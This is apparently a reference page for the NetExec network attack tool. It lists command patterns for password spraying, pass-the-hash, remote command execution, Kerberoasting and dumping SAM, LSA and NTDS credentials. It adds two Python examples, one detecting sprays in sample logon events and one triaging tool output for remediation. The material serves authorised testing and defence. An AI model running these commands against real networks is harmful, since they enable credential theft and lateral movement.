NetExec
Overview
NetExec (nxc) is a network service exploitation tool that supports SMB, WinRM, LDAP, MSSQL, SSH, RDP, and other protocols. It excels at spraying credentials, enumerating Active Directory, executing commands across multiple targets, and extracting sensitive data. NetExec is the successor to CrackMapExec (CME). On Kali: sudo apt install -y netexec.
ATT&CK Mapping
- Tactics: TA0007 - Discovery, TA0008 - Lateral Movement
- Techniques: T1018 - Remote System Discovery, T1021.002 - SMB/Windows Admin Shares
Authentication Patterns
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Password
nxc <protocol> <target> -u <user> -p <password>
# NTLM hash (pass-the-hash)
nxc <protocol> <target> -u <user> -H <ntlm_hash>
# Domain authentication
nxc <protocol> <target> -u <user> -p <password> -d <domain>
# Local authentication
nxc <protocol> <target> -u <user> -p <password> --local-auth
# Multiple targets
nxc <protocol> <targets_file> -u <user> -p <password>
nxc <protocol> 10.10.10.0/24 -u <user> -p <password>
```
SMB Module
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Enumerate hosts (no auth)
nxc smb 10.10.10.0/24
# Check credentials (Pwn3d! = admin access)
nxc smb <target> -u <user> -p <password>
# Execute commands
nxc smb <target> -u <user> -p <password> -x "whoami"
nxc smb <target> -u <user> -p <password> -X "Get-Process"
# Enumerate shares
nxc smb <target> -u <user> -p <password> --shares
# Spider shares for files
nxc smb <target> -u <user> -p <password> -M spider_plus
# Dump SAM hashes
nxc smb <target> -u <admin> -p <password> --sam
# Dump LSA secrets
nxc smb <target> -u <admin> -p <password> --lsa
# Dump NTDS.dit (DCSync)
nxc smb <dc_ip> -u <admin> -p <password> --ntds
# RID brute force (user enumeration)
nxc smb <target> -u <user> -p <password> --rid-brute
# Enumerate logged-on users
nxc smb <target> -u <user> -p <password> --loggedon-users
# Pass the hash
nxc smb <target> -u <user> -H <ntlm_hash>
```
LDAP Module
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Enumerate domain users
nxc ldap <dc_ip> -u <user> -p <password> --users
# Get domain SID
nxc ldap <dc_ip> -u <user> -p <password> --get-sid
# Password policy
nxc ldap <dc_ip> -u <user> -p <password> --pass-pol
# Kerberoasting
nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting output.txt
# AS-REP Roasting
nxc ldap <dc_ip> -u <user> -p <password> --asreproast output.txt
# Find delegation
nxc ldap <dc_ip> -u <user> -p <password> --find-delegation
nxc ldap <dc_ip> -u <user> -p <password> --trusted-for-delegation
# Enumerate trusts (via BloodHound collection)
nxc ldap <dc_ip> -u <user> -p <password> --bloodhound -c Trusts
# BloodHound collection
nxc ldap <dc_ip> -u <user> -p <password> --bloodhound --dns-server <dc_ip> -c All
```
WinRM Module
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Check WinRM access
nxc winrm <target> -u <user> -p <password>
# Execute commands
nxc winrm <target> -u <user> -p <password> -x "whoami"
nxc winrm <target> -u <user> -p <password> -X "Get-Process"
```
MSSQL Module
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Check MSSQL access
nxc mssql <target> -u <user> -p <password>
# Windows auth
nxc mssql <target> -u <user> -p <password> -d <domain>
# Execute SQL
nxc mssql <target> -u <user> -p <password> -q "SELECT system_user"
# Execute OS command (requires xp_cmdshell)
nxc mssql <target> -u <user> -p <password> -x "whoami"
```
Password Spraying
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Spray one password across multiple users
nxc smb <dc_ip> -u users.txt -p 'Password123' --continue-on-success
# Spray with hash
nxc smb <dc_ip> -u users.txt -H <ntlm_hash> --continue-on-success
# Multiple protocols
nxc winrm <dc_ip> -u users.txt -p 'Password123' --continue-on-success
nxc ssh <target> -u users.txt -p 'Password123' --continue-on-success
```
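From the defender's side, a spray like the commands above has a distinctive shape in the domain controller's Security log: one source address producing 4625 (failed logon) events against many distinct accounts in a short window, and, because `--continue-on-success` keeps going, often a 4624 (successful logon) for an account that never failed. The following added example is not part of NetExec or of this page; it runs a sliding-window detection over constructed sample events shaped like a SIEM export of those two event IDs (timestamp, event ID, source address, account name). The window and account thresholds are assumptions to tune for your environment.

```python
"""Detect password-spray patterns in Windows Security events.

Added example (not part of the NetExec project or this page). The events
below are constructed to resemble the fields of Event ID 4625 (failed
logon) and 4624 (successful logon) as exported by a SIEM.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, source_ip, account)
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:00", 4625, "10.10.10.50", "alice"),
    ("2024-05-01T10:00:01", 4625, "10.10.10.50", "bob"),
    ("2024-05-01T10:00:01", 4625, "10.10.10.50", "carol"),
    ("2024-05-01T10:00:02", 4625, "10.10.10.50", "dave"),
    ("2024-05-01T10:00:02", 4625, "10.10.10.50", "erin"),
    ("2024-05-01T10:00:03", 4624, "10.10.10.50", "frank"),  # spray hit
    ("2024-05-01T10:00:03", 4625, "10.10.10.50", "grace"),
    ("2024-05-01T10:05:00", 4625, "10.10.10.77", "alice"),  # one user mistyping
    ("2024-05-01T10:05:30", 4625, "10.10.10.77", "alice"),
    ("2024-05-01T10:06:00", 4624, "10.10.10.77", "alice"),
]

# Assumed thresholds: tune to the size and noise of your environment.
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_ACCOUNTS = 5


def parse_ts(s):
    return datetime.fromisoformat(s)


def detect_spray(events, window=WINDOW, min_accounts=MIN_DISTINCT_ACCOUNTS):
    """Return {source_ip: {"failed_accounts": set, "successes": set}} for
    every source whose failed logons cover at least `min_accounts` distinct
    accounts inside some window of length `window`.

    A single user mistyping their password fails many times against ONE
    account and is not flagged; a spray fails once against MANY accounts.
    """
    by_src = defaultdict(list)
    for ts, eid, src, acct in events:
        by_src[src].append((parse_ts(ts), eid, acct))

    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        fails = [(t, a) for t, e, a in evs if e == 4625]
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            distinct = {a for _, a in fails[start:end + 1]}
            if len(distinct) >= min_accounts:
                findings[src] = {
                    # All accounts this source failed against, not just
                    # the ones inside the triggering window.
                    "failed_accounts": {a for _, a in fails},
                    # Successes from the same source are the spray hits
                    # (with --continue-on-success they may never have
                    # produced a failure at all).
                    "successes": {a for _, e, a in evs if e == 4624},
                }
                break
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {len(f['failed_accounts'])} accounts failed, "
              f"successes={sorted(f['successes'])}")
```

The source address is the pivot rather than the account: account lockout policy alone does not stop a spray that tries one password per account, which is exactly why the `--continue-on-success` pattern is used, so the detection must count distinct accounts per source.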
Output Options
```bash
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Log results to file
nxc smb <target> -u <user> -p <password> --log output.log
# Export domain users to file
nxc smb <target> -u <user> -p <password> --users-export users.txt
```
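A log written with `--log` is mostly useful after the engagement, when the findings have to be turned into remediation items: which hosts do not require SMB signing, which credentials were valid where, and which account is a local administrator (`Pwn3d!`) on more than one host. The following added example is not part of NetExec or of this page; it parses constructed lines laid out like NetExec's console output (protocol, address, port, hostname, `[*]`/`[+]`/`[-]` status, message). The exact column spacing and message wording are assumptions taken from typical output; adjust the regular expressions if your version prints differently.

```python
"""Triage NetExec output into remediation findings.

Added example (not part of the NetExec project or this page). The sample
lines are constructed to match NetExec's column layout; the spacing and
banner wording are assumptions.
"""
import re

# Constructed sample output (backslashes escaped for the Python literal).
SAMPLE_OUTPUT = """
SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.20     445    FILES01          [*] Windows 10 Build 19041 x64 (name:FILES01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [-] corp.local\\svc_backup:Password123 STATUS_LOGON_FAILURE
SMB         10.10.10.20     445    FILES01          [+] corp.local\\svc_backup:Password123 (Pwn3d!)
SMB         10.10.10.20     445    FILES01          [+] corp.local\\jdoe:Password123
WINRM       10.10.10.20     5985   FILES01          [+] corp.local\\svc_backup:Password123 (Pwn3d!)
"""

# One output line: protocol, ip, port, hostname, [status], free-text message.
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<status>[*+\-!])\]\s+(?P<msg>.*)$"
)
# Credential message: DOMAIN\user:secret, optionally followed by (Pwn3d!).
CRED_RE = re.compile(r"^(?P<principal>\S+?):(?P<secret>\S+)(?P<admin>\s+\(Pwn3d!\))?")


def parse_lines(text):
    """Parse every line that matches the column layout into a dict."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def hosts_without_signing(records):
    """Hosts whose SMB banner reports signing not required: a relay
    exposure and a hardening item (require SMB signing via GPO)."""
    return sorted({r["host"] for r in records
                   if r["proto"] == "SMB" and r["status"] == "*"
                   and "(signing:False)" in r["msg"]})


def valid_credentials(records):
    """Return (protocol, host, principal, is_admin) for each [+] line."""
    out = []
    for r in records:
        if r["status"] != "+":
            continue
        m = CRED_RE.match(r["msg"])
        if m:
            out.append((r["proto"], r["host"], m["principal"], bool(m["admin"])))
    return out


def admin_footholds(records):
    """Distinct (protocol, host, principal) where the account is admin."""
    return sorted({(p, h, u) for p, h, u, adm in valid_credentials(records) if adm})


if __name__ == "__main__":
    recs = parse_lines(SAMPLE_OUTPUT)
    print("SMB signing not required:", hosts_without_signing(recs))
    for p, h, u in admin_footholds(recs):
        print(f"admin: {u} on {h} via {p}")
```

Grouping `admin_footholds` by principal is the quickest way to surface a shared local administrator or an over-privileged service account across hosts, which is the finding the remediation owner actually needs rather than the raw command log.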